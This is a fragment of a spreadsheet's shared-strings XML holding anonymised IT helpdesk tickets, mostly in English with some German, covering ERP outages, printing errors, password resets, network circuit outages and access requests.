    <t>erp produktion hÃ¤ngt bei ot03 auftrÃ¤gen</t>
  </si>
  <si>
    <t>ot01 auftrÃ¤ge funktionieren, ot03 auftrÃ¤ge lassen sich nicht bearbeiten ( beim ausliefern)</t>
  </si>
  <si>
    <t>jftsvazy ypqmliwa</t>
  </si>
  <si>
    <t>abended job in job_scheduler: Job_1953d</t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
 abended job in job_scheduler: Job_1953d at 08/11/16 16:08:25</t>
  </si>
  <si>
    <t>outage on erp SID_34</t>
  </si>
  <si>
    <t>totalteamsales sproc is not assigning direct team revenue to employees</t>
  </si>
  <si>
    <t>skype shows i am online but i am not</t>
  </si>
  <si>
    <t xml:space="preserve">i have noticed that i received by email some messages of skype for business even when i am off line. i did a uacyltoe hxgaycze, i have turned off my pc and smartphone, and from the pc of my colleagues it shows i am "inactive or away". then people send me message. </t>
  </si>
  <si>
    <t>need ticket  zmm_stock_transfer</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: dqplrwoy.cutpwjie@gmail.com
programdnty zmm_stock_transfer is not processing.  it's been on an eternal circle.
franhtyu â€“ rebalancing not completing.
dqplrwoy cutpwjie
supply chain planner
dqplrwoy.cutpwjie@gmail.com&lt;mailto:dqplrwoy.cutpwjie@gmail.com&gt;
</t>
  </si>
  <si>
    <t>install a printer in maintenance area</t>
  </si>
  <si>
    <t>ifsrenpq lkembgtd</t>
  </si>
  <si>
    <t>how did you determine there are network problems  erp SID_34_x000D_
_x000D_
is only erp slow ? (please use the quick ticket within the erp folder if only erp is running slow) yes erp slow_x000D_
_x000D_
are more than one transactions impacted yes _x000D_
_x000D_
what erp server are you on (server name is located in the status bar at the bottom _x000D_
right of your screen)  HostName_200_x000D_
_x000D_
do other co-workers also notice slow response times in erp - yes, four users at usa _x000D_
_x000D_
what other applications are running slow - erp SID_34_x000D_
_x000D_
can you access your data files on the server _x000D_
_x000D_
any other comments or issues with other systems ?</t>
  </si>
  <si>
    <t>gbxctqfl akrwmuib</t>
  </si>
  <si>
    <t xml:space="preserve">please provide details in the template below (if multiple applications are impacted, please use the quick ticket template in the "operations" folder).
site / location :  usa
user id (ad) : dinkifgtrl
system you are seeing performance problems on (please list all) (e.g., crm, erp, bw, bobj): SID_34 erp production //  server name - HostName_201
transactions that are slow (e.g., va01, create an order): quotes and orders // va01, va21
area this belongs to (e.g., sales, finance, markhtyeting etc.):  sales (as per robhyertyj)
how can this issue be replicated by the it support group: 
are other users seeing this? yes, 40+
please attach relevant screenshots and exact times when the issue occurred: attached
user name - robhyertyj l dinfgrtyukins
contact no - </t>
  </si>
  <si>
    <t>check my security for the ethics collaboration_platform page</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: azxhejvq.fyemlavd@gmail.com
hi,
please check my security for the ethics collaboration_platform page.  i am trying to upload a file to the "procedures" category folder.  i was able to upload to the noname category, but for some reason i cannot upload into procedures.  i suspect a security setting.
[cid:image001.png@01d1f3e3.d3542d50]
mikhghytr wafglhdrhjop
sr. manager, global ethics and compliance programdntys
</t>
  </si>
  <si>
    <t>problem</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: vkzwafuh.tcjnuswg@gmail.com
hi,
when i try to submit a discount form i get the below error. please advise.
[cid:image001.jpg@01d1f3d7.bdb9e590]
vkzwafuh tcjnuswg - cmp
sr. application eng.
vkzwafuh.tcjnuswg@gmail.com
</t>
  </si>
  <si>
    <t>abended job in job_scheduler: Job_1967d</t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
 abended job in job_scheduler: Job_1967d at 08/11/16 14:53:25</t>
  </si>
  <si>
    <t>site contact reported circuit outage in south amerirtca</t>
  </si>
  <si>
    <t xml:space="preserve">santiago-south amerirtca has reported that today (11/08/2016) between 12:40pm and 1:10pm (30 minutes), the dmvpn was not working. they have contacted the local isp which confirmed that the internet circuit was working fine._x000D_
could you please investigate the logs of the router and let us know your findings?_x000D_
i am surprised that datacenter team did not contacted us about that issue._x000D_
 </t>
  </si>
  <si>
    <t>circuit outage:apac/fengapac - (company) vpn circuit is down at 2:14 pm et on 08/11. site is up on primary circuit.</t>
  </si>
  <si>
    <t>what type of outage:  _____network     __x___circuit     _____power (please specify what type of outage)_x000D_
_x000D_
1. top 23 cert site   ?    ____no_____     (yes/no/na) _x000D_
_x000D_
2. when did it start  ?   ______2:14 pm et on 08/11________________x000D_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______na_____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</si>
  <si>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unable to login to SID_1 using erp gui</t>
  </si>
  <si>
    <t xml:space="preserve">hi,_x000D_
i am unable to login to SID_1 today and i see the error shown in the screenshots._x000D_
request your help at the earliest since i'm trying to uacyltoe hxgaycze something related to engineering_tool._x000D_
</t>
  </si>
  <si>
    <t>power outage: india, india site is hard down at 1:29pm et on 08/11.</t>
  </si>
  <si>
    <t>what type of outage:  ___x__network     _____circuit     _____power (please specify what type of outage)_x000D_
_x000D_
1. top 23 cert site   ?    __no_______     (yes/no/na) _x000D_
_x000D_
2. when did it start  ?   _______1:29pm et on 08/11._______________x000D_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no(yes/no/na) _x000D_
_x000D_
6. backup circuit active ?   ___no_____     (yes/no/na) _x000D_
_x000D_
7. site contact notified (phone/email) ?  _________     (yes/no/na) _x000D_
_x000D_
8. remote dial-in ?   ______na_____   (yes/no/na) _x000D_
_x000D_
9. equipment reset ?    ____na_______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</si>
  <si>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programdnty in erp not loading</t>
  </si>
  <si>
    <t xml:space="preserve">license query </t>
  </si>
  <si>
    <t xml:space="preserve">hello ,_x000D_
please arrange that mrs de gracia fernandez ghjkzalez (100783) a k1 (access to your payroll) gets approval._x000D_
</t>
  </si>
  <si>
    <t>lhqsm674 (kas hfyujqti jdcbiezx2): average (4 samples) disk free on c:\ is now 9%, which is below the warning threshold.</t>
  </si>
  <si>
    <t>lhqsm674 (kas hfyujqti jdcbiezx2): average (4 samples) disk free on c:\ is now 9%, which is below the warning threshold (10%) out of total size 75.0 gb</t>
  </si>
  <si>
    <t>npc 311190861. please refer screenshot.</t>
  </si>
  <si>
    <t xml:space="preserve">npc 311190861. mrp type incorrect error. </t>
  </si>
  <si>
    <t>wgyzrovu boerxlmw</t>
  </si>
  <si>
    <t>please provide details in the template below (if multiple applications are impacted, please use the quick ticket template in the "operations" folder).
site / location :  corporate
user id (ad) :  prohgtyarb
system you are seeing performance problems on (please list all) (e.g., crm, erp, bw, bobj):  workflow
transactions that are slow (e.g., va01, create an order):  quote
area this belongs to (e.g., sales, finance, markhtyeting etc.):  sales
how can this issue be replicated by the it support group: 
are other users seeing this? 
please attach relevant screenshots and exact times when the issue occurred: q#3116214820 is stuck in my workflow, when i try to go in it, says i am in it, and i cannot save it out</t>
  </si>
  <si>
    <t>jpufgorh xltfrpcy</t>
  </si>
  <si>
    <t>major problem with inventory</t>
  </si>
  <si>
    <t xml:space="preserve">the needs to be sev2.  because it heavily limits the amount of production i can put out on the floor. also, multiple people and departments are affected, not just me. this includes many additional man-hours._x000D_
_x000D_
received from: lijrvdgh.wfhmdsoa@gmail.com_x000D_
_x000D_
i am having an issue with the oracle powder charging system automatically issuing material to production orders in erp.  we are having to use many extra man hours manually entering in the data in erp.  also, this problem dramdntyatically decreases the efficiency and accuracy or issuing production orders._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>unable to log in to windows</t>
  </si>
  <si>
    <t xml:space="preserve"> usa, ar - pbx (rqxaudix.company.com) is down since 11:24am on 08/11/16</t>
  </si>
  <si>
    <t>access to security group : k-gshn</t>
  </si>
  <si>
    <t xml:space="preserve">
summary:please add me to the k-gshn e-mail group.  </t>
  </si>
  <si>
    <t>kmubdazp qmxwszko</t>
  </si>
  <si>
    <t>plug in not responding error in erp</t>
  </si>
  <si>
    <t>error message in pthsqroz moedyanvess</t>
  </si>
  <si>
    <t xml:space="preserve">
erp pthsqroz moedyanvess
error message: "object notification: business operation not entered in your user master'
</t>
  </si>
  <si>
    <t>hseazwyd tmisvleo</t>
  </si>
  <si>
    <t>outlook goes to not responding</t>
  </si>
  <si>
    <t xml:space="preserve">user wanted to reset internet explorer </t>
  </si>
  <si>
    <t>gwkjrobm wrsznjmx</t>
  </si>
  <si>
    <t xml:space="preserve">erp SID_34 erp production account locked </t>
  </si>
  <si>
    <t>transfer information from old to new laptop</t>
  </si>
  <si>
    <t>pahdlbnw nycrtsom</t>
  </si>
  <si>
    <t>can't print in color</t>
  </si>
  <si>
    <t>color printer not working</t>
  </si>
  <si>
    <t>HostName_562</t>
  </si>
  <si>
    <t>i'm unable to reach the destination server ... is it offline ?</t>
  </si>
  <si>
    <t>zpress does not save data for material 5666264</t>
  </si>
  <si>
    <t>zpress does not save data for material 6777375, pl. check for order no 115697658</t>
  </si>
  <si>
    <t>can not join skype meeting</t>
  </si>
  <si>
    <t>paqrentz gcnyaxsb</t>
  </si>
  <si>
    <t>pc aufstellen</t>
  </si>
  <si>
    <t>bitte an smpijawb eawkpgqf weiterleiten:_x000D_
nachdem das alicona messgerÃ¤t umgestellt wurde, muss der pc fÃ¼r sdnemlwy dsbmgonk aufgebaut werden (apl vor juchaomy gaxrulwo - av abstechprogramdntym)._x000D_
soll termin bis 26.august_x000D_
mitarbeiterin kommt am 29.august zurÃ¼ck</t>
  </si>
  <si>
    <t>arbeitsplatz umziehen</t>
  </si>
  <si>
    <t>bitte an smpijawb eawkpgqf weiterleiten:_x000D_
alicona messgerÃ¤t muss von av abstechprogramdntym in halle 4 (ehem. ventilstÃ¶ÃŸel kontrolle) umgestellt werden._x000D_
soll termin in kw 33</t>
  </si>
  <si>
    <t>unable to launch outlook and skype</t>
  </si>
  <si>
    <t>xeocpjsu hqwxumfb</t>
  </si>
  <si>
    <t>access to q drive for pollaurid w</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
received from: inhekdol.anvqzdif@gmail.com_x000D_
_x000D_
hello,_x000D_
_x000D_
can you help to put in a ticket for access to the quality assurance drive (q) for employee uqjbkydr bsqofdlx (username: whalep) aerp?_x000D_
_x000D_
i have copied the "owner" of the drive: eozqgims rbmosifh, quality manager for permission reasons._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>flash player incompatibility</t>
  </si>
  <si>
    <t xml:space="preserve">no audio device installed </t>
  </si>
  <si>
    <t>vbihmtzo mphkitvr</t>
  </si>
  <si>
    <t>need help in connecting a skype meeting that is coming up with an error</t>
  </si>
  <si>
    <t>unable to open pdf files.</t>
  </si>
  <si>
    <t>unable to open pdf files in user system</t>
  </si>
  <si>
    <t>lediwjvb tqijrdgw</t>
  </si>
  <si>
    <t>not able to use command field</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: ulroqsyf.wctpnarb@gmail.com_x000D_
_x000D_
hello,_x000D_
_x000D_
i am not able to use command field. by default it is taking mc+e._x000D_
pl. help_x000D_
_x000D_
_x000D_
[cid:image001.jpg@01d1f3f8.207cbde0]_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>microsoft .net framdntyework 4.5 missing</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: kuznvase.jrxtbuqz@gmail.com_x000D_
_x000D_
dear all,_x000D_
please open ticket and address shortly._x000D_
</t>
  </si>
  <si>
    <t>netweaver will not start</t>
  </si>
  <si>
    <t>i receive an error message when trying to start business_client. "microsoft net framdntyework 4.5 is not installed" i upgraded my knovel software last night and now i am receiving this message.
 ext 133 ( ldil8514566)</t>
  </si>
  <si>
    <t>rmxqfivn pfgcirlh</t>
  </si>
  <si>
    <t>please, send me a link for password_management_tool password manager.</t>
  </si>
  <si>
    <t>cedxqshz sepbvatm</t>
  </si>
  <si>
    <t>skype funktionert nicht.</t>
  </si>
  <si>
    <t xml:space="preserve">from: zlnxswvp ptmzsbhk _x000D_
sent: thursday, august 11, 2016 11:58 am_x000D_
to: nwfodmhc exurcwkm_x000D_
subject: sab : wg: skype lÃ¤sst sich nicht starten_x000D_
_x000D_
bitte um unterstÃ¼tzung _x000D_
_x000D_
freundliche gruesse / kind </t>
  </si>
  <si>
    <t>headset</t>
  </si>
  <si>
    <t>connecting the plantronic headset beshryuwire c725 with thecomputer the speaker of the computer is turned on, too._x000D_
how can it be turned off._x000D_
_x000D_
note: the issue already was solved.</t>
  </si>
  <si>
    <t>datenÃ¼bertragung</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: weszfyok.fbadnjhu@gmail.com_x000D_
_x000D_
hallo,_x000D_
_x000D_
es gibt anscheinend probleme bei der Ã¼bertragung von stempelzeiten ( EU_tool / erp ) bei 8-stelligen personalnummern ( siehe unten )_x000D_
_x000D_
freundliche grÃ¼ÃŸe_x000D_
weszfyok fbadnjhu_x000D_
_x000D_
_x000D_
von: axesnghb cyzuomxa_x000D_
gesendet: donnerstag, 28. juli 2016 12:17_x000D_
an: zslugaxq dtwlrofu; laeusvjo fvaihgpx_x000D_
cc: weszfyok fbadnjhu_x000D_
betreff: leihmitarbeiter lochthowe, andre, 21111177_x000D_
_x000D_
_x000D_
hallo zusammen,_x000D_
_x000D_
seit dem 21.07.2016  stempelt herr lochthowe mit seiner karte in EU_tool ._x000D_
_x000D_
seit dem zeitpunkt werden die daten nicht an erp Ã¼bertragen._x000D_
_x000D_
hier stimmt etwas nicht mit der  karten- nr.  oder der stammnummer._x000D_
_x000D_
wir haben hier den ersten mitarbeiter mit einer  achtstelligen stammnummer._x000D_
_x000D_
kann es daran liegen ????_x000D_
_x000D_
bitte  mal prÃ¼fen._x000D_
_x000D_
_x000D_
_x000D_
mit freundlichen grÃ¼ÃŸen_x000D_
best </t>
  </si>
  <si>
    <t>bobj webi jobs are not running</t>
  </si>
  <si>
    <t>bobj webi jobs are not running. please investigate at the earliest.</t>
  </si>
  <si>
    <t>international payments rejected for payment method "l"</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
von: pradyhtueep yyufs _x000D_
gesendet: 10 august 2016 09:10_x000D_
an: ubiqcrvy mxjcnqfs; nathyresh gayhtjula; -erp-fico; ebusaar munnangi_x000D_
cc: iszaguwe bdfzamjs; pkjhmfgc zuvjqgwa; joacrhfz ctrbjusz; maryhtutina bauuyternfeyt_x000D_
betreff: re: zahllauf nicht ausgefÃ¼hrt - international payments rejected_x000D_
_x000D_
jartnine,_x000D_
_x000D_
we are looking into the development changes which were implemented recently. we will get back to you by tomorrow._x000D_
_x000D_
sorry for any inconvenience._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>laptop doesnt stay on , power light stays on for 1 minute only and goes off.</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
laptop doesnt stay on , power light stays on for 1 minute only and goes off._x000D_
_x000D_
_x000D_
from: bmhxwvys tdmgolwn _x000D_
sent: thursday, august 11, 2016 3:08 pm_x000D_
to: nwfodmhc exurcwkm_x000D_
cc: zrpemyab xvzwcbha_x000D_
subject: tru : fw: damaged laptop_x000D_
_x000D_
_x000D_
dear sir_x000D_
_x000D_
damage dell laptop lit only 1 minute in, see attachment_x000D_
thank for the response and cooperation._x000D_
_x000D_
best </t>
  </si>
  <si>
    <t>erp password reset in SID_34</t>
  </si>
  <si>
    <t>erp log on problem</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: pgeknaxy.usokqprd@gmail.com_x000D_
_x000D_
hello team,_x000D_
_x000D_
i can not log on erp with my password._x000D_
_x000D_
could you help me for this issue?_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>password reset alert from o365 for user lafgturie sherwtgyu</t>
  </si>
  <si>
    <t>when connecting to hr_tool, etime window will open but nothing populates the screen. empty screen for etime, no access.</t>
  </si>
  <si>
    <t xml:space="preserve">, hr_tool portal access through single sign-on not working. </t>
  </si>
  <si>
    <t>business card request</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: zqbmxdgy.stuwbacm@gmail.com
hello team,
can you please arrange a business card for me , please find the details below and let me know the protocol for the same .
zqbmxdgy stuwbacm
analyst -   apps  dev maintenance &amp; ebus 
zqbmxdgy.stuwbacm@gmail.com&lt;mailto:zqbmxdgy.stuwbacm@gmail.com&gt;
warm </t>
  </si>
  <si>
    <t>zqbmxdgy stuwbacm</t>
  </si>
  <si>
    <t>to remove plant_101 plant assignment to sale orgs 1444 &amp; 1445 - romania &amp; slovakia project related</t>
  </si>
  <si>
    <t xml:space="preserve">this was supposed to be removed immediately after uat, however we missed removing this assignment. shipment from plant_101 was assigned only for uacyltoe hxgayczeing purposes. business requirement may come in future. </t>
  </si>
  <si>
    <t>ospmbweg peswfcbj</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: zqbmxdgy.stuwbacm@gmail.com
hello team,
can you please arrange a business card for me , please find the details below and let me know the protocol for the same .
zqbmxdgy stuwbacm
analyst -   apps  dev maintenance &amp; ebus -  erp sd 
zqbmxdgy.stuwbacm@gmail.com&lt;mailto:zqbmxdgy.stuwbacm@gmail.com&gt;
warm </t>
  </si>
  <si>
    <t>wegen ein sicherheitsupdate kb4272050 sind keine netzwerkverbindung moeglich</t>
  </si>
  <si>
    <t>wegen ein sicherheitsupdate kb4272050 sind keine netzwerkverbindung moeglich._x000D_
_x000D_
fehlermeldung : keine netzwerk verbinung.</t>
  </si>
  <si>
    <t>szfaidhy sivyugjd</t>
  </si>
  <si>
    <t xml:space="preserve">could you please changes the o365 license  of the following employees from "s1"  to "k1"
luifdsts olhryhira  - 3005661000
cost center pam003
maertosv 315463440 krsxguty odqpwsgi krsxguty.odqpwsgi@gmail.com
soarewer1 31543252 uzavdmoj wrpkolzq uzavdmoj.wrpkolzq@gmail.com
alvesdss 315534434 kgcw isyfngdz ziqmkgcw.isyfngdz@gmail.com
machasssg 315423428 puxqyesm xqathyuz gislei.machado@company.com
peredrfifj 315484560 flavio pereira flavio.pereira@company.com
schidrftas 315453454 maihdlne xodeqlsv maihdlne.xodeqlsv@gmail.com
vieiresddr 315463249 dfjbnrem vabqwxlm dfjbnrem.vabqwxlm@gmail.com
albussdqp 31565532 imeytghj lyrikzep imeytghj.lyrikzep@gmail.com
larsffar 3156232361 rafaelm lara aiuknwzj.nbsjzkqa@gmail.com
ribewddwic 315252651 fhkebpyx tqpermnu fhkebpyx.tqpermnu@gmail.com
carmsswot 31525455 uvyjpixc kbfcrauw uvyjpixc.kbfcrauw@gmail.com
garcisdwr 31552598 rodrigo fernansdes garcia rodrigofernandes.garcia@company.com
olivesswc2 315271 gcbrdkzl oamkcufr cassio.olibercsu@company.com
placisddwd 31502561 douglas placido douglas.placido@company.com
grateful!
</t>
  </si>
  <si>
    <t>ufawcgob aowhxjky</t>
  </si>
  <si>
    <t xml:space="preserve">HostName_1003:( kisp - iis - app server production )disk free on e:\ is now 15%, which is below the warning threshold (15%)  </t>
  </si>
  <si>
    <t>orders can not be printed.</t>
  </si>
  <si>
    <t xml:space="preserve">es kann keine auftrag gedruckt werden. ziehe fehler. </t>
  </si>
  <si>
    <t>bfjnyqhe wqhuvlfb</t>
  </si>
  <si>
    <t>change erp logon language from german to english</t>
  </si>
  <si>
    <t>vuefwrmk snaelbgp</t>
  </si>
  <si>
    <t>erp SID_34 password reset for user mertut</t>
  </si>
  <si>
    <t xml:space="preserve">account locked_x000D_
</t>
  </si>
  <si>
    <t>please reset erp SID_34 password for user peilerk - thank you!</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: krdvgzeh.yboasemp@gmail.com_x000D_
_x000D_
Ã¼dvÃ¶zlettel / mit freundlichen grÃ¼ÃŸen / best </t>
  </si>
  <si>
    <t>printing</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: yfmaqovp.wdonhbez@gmail.com_x000D_
_x000D_
hello all,_x000D_
_x000D_
do you have any news about the issue of printing of drawings and production papers?_x000D_
when is the issue solved?_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">cannot release order / does not print </t>
  </si>
  <si>
    <t>plant_108 -&gt; SID_34</t>
  </si>
  <si>
    <t>GRP_72</t>
  </si>
  <si>
    <t>erp/SID_34 - production orders cannot be printed out</t>
  </si>
  <si>
    <t>error:_x000D_
verbindung zu system production_order_interface_app-fu mit destination_x000D_
production_order_interface_vendor-connc-fu fehlerhaft:_x000D_
fehler beim Ã¶ffnen einer rfc-verbindung (cpic-call_x000D_
(1).</t>
  </si>
  <si>
    <t>restore some folders for stoebtrt</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: sxhcapoe.kbluefip@gmail.com_x000D_
_x000D_
hello,_x000D_
path to the folder:_x000D_
\\HostName_705\departments\lean\leanÂ³-projekte\lean-projekte_geplant\fy17&lt;file:///\\HostName_705\departments\lean\leanÂ³-projekte\lean-projekte_geplant\fy17&gt;_x000D_
_x000D_
_x000D_
--_x000D_
mit freundlichen grÃ¼ÃŸen / best </t>
  </si>
  <si>
    <t>abended job in job_scheduler: SID_37hotf</t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
 abended job in job_scheduler: SID_37hotf at 08/11/16 04:35:26</t>
  </si>
  <si>
    <t>wir haben hier in koenigsee probleme mit dem druck aus erp. es kommt ein "production_order_interface_app" fehler.</t>
  </si>
  <si>
    <t xml:space="preserve">wir haben hier in koenigsee probleme mit dem druck aus erp. es kommt ein "production_order_interface_app" fehler._x000D_
</t>
  </si>
  <si>
    <t>ludhvmro okdbwcsu</t>
  </si>
  <si>
    <t>error drucker</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: gsnuhpji.qpyfctwl@gmail.com_x000D_
_x000D_
es wird nichts mehr ausgedruckt_x000D_
fehlermeldung_x000D_
[cid:image001.png@01d1f3ba.6428d800]_x000D_
_x000D_
mit freundlichen grÃ¼ÃŸen / best </t>
  </si>
  <si>
    <t>gsnuhpji qpyfctwl</t>
  </si>
  <si>
    <t>setup new ws \chkzbeav ykeilmog</t>
  </si>
  <si>
    <t>chkzbeav ykeilmog</t>
  </si>
  <si>
    <t>no connection to the production_order_interface_app-fu (production_order_interface_vendor connc fu)</t>
  </si>
  <si>
    <t>hello,_x000D_
_x000D_
we have no connection to the plsseald-fu server. i think the server is down._x000D_
we can't print production orders in germany_x000D_
_x000D_
_x000D_
no connection to the production_order_interface_app-fu (production_order_interface_vendor connc fu)_x000D_
error rfc connection (cpic-call)</t>
  </si>
  <si>
    <t>setup new ws \ylhptzmd owslfzqi</t>
  </si>
  <si>
    <t>ylhptzmd owslfzqi</t>
  </si>
  <si>
    <t>setup new ws \wphqnxly htvrbxmd</t>
  </si>
  <si>
    <t>wphqnxly htvrbxmd</t>
  </si>
  <si>
    <t>barcode scanner defekt \pifyudbo tagsfbny</t>
  </si>
  <si>
    <t>pifyudbo tagsfbny</t>
  </si>
  <si>
    <t xml:space="preserve">1.) search material code are unavailable that seraching result is 0 via "specification"_x000D_
</t>
  </si>
  <si>
    <t>ewylacup jlibymtw</t>
  </si>
  <si>
    <t>elengineering toolonic ethics for employee cajdwtgq breqgycv - training course not activated</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: aofnvyzt.eqiyskhm@gmail.com_x000D_
_x000D_
hello team,_x000D_
good morning_x000D_
_x000D_
please your help to add ethics training course to my csr member , cajdwtgq breqgycv._x000D_
_x000D_
daria is working in company since march 2015 and despite all our requests since she joined company_x000D_
she never received the training course invitation as required to be completed by all employees._x000D_
_x000D_
we've answered the below questions by your request,_x000D_
if further info is required, please let us know._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>outlook issues,yesterday my outlook took about2 hours to load ,  afterit was very very slow. today can not open outlook</t>
  </si>
  <si>
    <t xml:space="preserve">outlook issues,yesterday my outlook took about2 hours to load ,  afterit was very very slow. today can not open outlook anymore_x000D_
please check </t>
  </si>
  <si>
    <t>pcqjvair kxaoumqy</t>
  </si>
  <si>
    <t>dell 4 in 1</t>
  </si>
  <si>
    <t>dell 4 in 1 adapter not working</t>
  </si>
  <si>
    <t>pc is not booting up</t>
  </si>
  <si>
    <t>pc is not booting up. user has already spoken to steffen._x000D_
_x000D_
computer name : eagw8111608_x000D_
ext : 591</t>
  </si>
  <si>
    <t>read and write access to oe drive fÃ¼rth</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: scjxobhd.ldypjkmf@gmail.com_x000D_
_x000D_
hello help team ,_x000D_
_x000D_
can you pls. arrange read &amp; write access for dveuglzp mqetjxwp to the following oe drive on teams\\eagcldaten\teams:_x000D_
_x000D_
_x000D_
_x000D_
[cid:image002.jpg@01d1ee5f.057a25d0]_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>specification searching in SID_34 is not returning any results ... works okay in SID_1</t>
  </si>
  <si>
    <t>issue on pricing in distributor_tool</t>
  </si>
  <si>
    <t>we have agreed price with many of the distributors for a given period and skus.  this is specified through pricing condition zcnc in erp.  in distributor_tool, it is order through sold to &amp; ship to combination._x000D_
-       till august â€“ flat rate deployment, we did not have any issues._x000D_
-       today, when the distributor tried to book the order with zcnc pricing condition. the initial screen shows the correct price. but when the item is selected and quick order is clicked on, the price is getting changed to list price less standard discount instead of retaining the zcnc price.</t>
  </si>
  <si>
    <t xml:space="preserve">network outage :  melbourne (rowville) site is hard down at 01:34 am et on 08/11. </t>
  </si>
  <si>
    <t>what type of outage:  ___x__network     _____circuit     _____power (please specify what type of outage)_x000D_
_x000D_
1. top 23 cert site   ?    ____no_____     (yes/no/na) _x000D_
_x000D_
2. when did it start  ?   ________01:34 am et on 08/11______________x000D_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_no_____    (yes/no/na) _x000D_
_x000D_
6. backup circuit active ?   _no_______     (yes/no/na) _x000D_
_x000D_
7. site contact notified (phone/email) ?  ____yes phone warehouse_tool mail_____     (yes/no/na) _x000D_
_x000D_
8. remote dial-in ?   _____na______   (yes/no/na) _x000D_
_x000D_
9. equipment reset ?    ____no_______    (yes/no/na) _x000D_
_x000D_
10. verified site working on backup circuit ?  _____no__     (yes/no/na) _x000D_
_x000D_
11. vendor ticket  # ( global_telecom_1, verizon, telecom_vendor_1, telecom_vendor_2 )    _________________________       _x000D_
_x000D_
12. notified  gsc  ____yes____     (yes/no/na)    cert started  ?________    (yes/no/na) _x000D_
_x000D_
13.  additional diagnostics</t>
  </si>
  <si>
    <t>desktop notworking</t>
  </si>
  <si>
    <t xml:space="preserve">desktop connected to the phone system in server room at company is not working. please could you troubleshoot and fix the problem._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
 abended job in job_scheduler: Job_1148 at 08/11/16 01:15:24</t>
  </si>
  <si>
    <t>power adaptor in docking station is faulty</t>
  </si>
  <si>
    <t xml:space="preserve">if i connect my laptop to docking station and try to power on, encounter the attached message. have confirmed that the message does not appear if i use external adaptor or another docking station. serial number of docking station is qad1234013705. 
location: 4k-25. 
</t>
  </si>
  <si>
    <t>wjbtlxry gdbqzjyw</t>
  </si>
  <si>
    <t>circuit outage: mpls ciruit is down at matlxjgi elrndiuy since 12:19am et on 08/11. site is up on vpn.</t>
  </si>
  <si>
    <t>what type of outage:  _____network     __x___circuit     _____power (please specify what type of outage)_x000D_
_x000D_
1. top 23 cert site   ?    ___yes______     (yes/no/na) _x000D_
_x000D_
2. when did it start  ?   ______12:19am et on 08/11________________x000D_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__yes______     (yes/no/na) _x000D_
_x000D_
7. site contact notified (phone/email) ?  ___no______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</si>
  <si>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i can't login skype after change password </t>
  </si>
  <si>
    <t xml:space="preserve">i can't login skype after change password , but other application is ok </t>
  </si>
  <si>
    <t xml:space="preserve">89.61.05.183 - thermal warning </t>
  </si>
  <si>
    <t xml:space="preserve">89.61.05.183 - the temperature of the switch has reached red threshold. </t>
  </si>
  <si>
    <t>request to reset microsoft online services password for mvkpjdfi.guexyfpk@gmail.com</t>
  </si>
  <si>
    <t>mvkpjdfi guexyfpk</t>
  </si>
  <si>
    <t>outlook search issues</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: duoyrpvi.wgjpviul@gmail.com_x000D_
_x000D_
hi team,_x000D_
_x000D_
my outlook is failing to bring up emails in my search function:_x000D_
_x000D_
[cid:image001.png@01d1f3b2.4bb18b30]_x000D_
_x000D_
i have tried to rebuild the indexing but it fails. this has been happening all week._x000D_
_x000D_
i need to be able to use this function._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>help to install symantec in a computer lpaw7404734</t>
  </si>
  <si>
    <t>hi team, i need your help to reinstall antivirus (symantec) in a computer lpaw8515845. the symantec don't working._x000D_
_x000D_
if you have more doubts, please contact me.</t>
  </si>
  <si>
    <t xml:space="preserve">dell 7350: pc boot up  failure.urgent </t>
  </si>
  <si>
    <t xml:space="preserve">dell 7350: pc boot up  failure.
-had to try restart the pc multiple times.
the system reboots automatically.in a loop.
-finally got the pc up and running.
-seems to be issue with the pc .again the pc shut down.
computer name: lmsl9516544
-os: win 8
-contact : </t>
  </si>
  <si>
    <t>abended job in job_scheduler: Job_461</t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
 abended job in job_scheduler: Job_461 at 08/10/16 17:44:25</t>
  </si>
  <si>
    <t>new employee mikhghytr karaffa - needs new desk phone</t>
  </si>
  <si>
    <t xml:space="preserve">new employee mikhghytr karaffa - needs new desk phone
phone: </t>
  </si>
  <si>
    <t>global erp crm:  it appears that erp crm is trying to send the "review by sales" email to the customer contact.</t>
  </si>
  <si>
    <t>global erp crm:  it appears that erp crm is trying to send the "review by sales" email to the customer contact.  the "review by sales" email was originally configured so that it would only get sent to the sales employee.  the "review by sales" email should never get sent to the customer contact.  examples 7611181804, 7611181405, 7611181483.  refer to the attached screen shots.  did someone change something?  please investigate and advise aerp.</t>
  </si>
  <si>
    <t>aqritplu beuflorc</t>
  </si>
  <si>
    <t>password reset for bsopzxhi irfhcgzq</t>
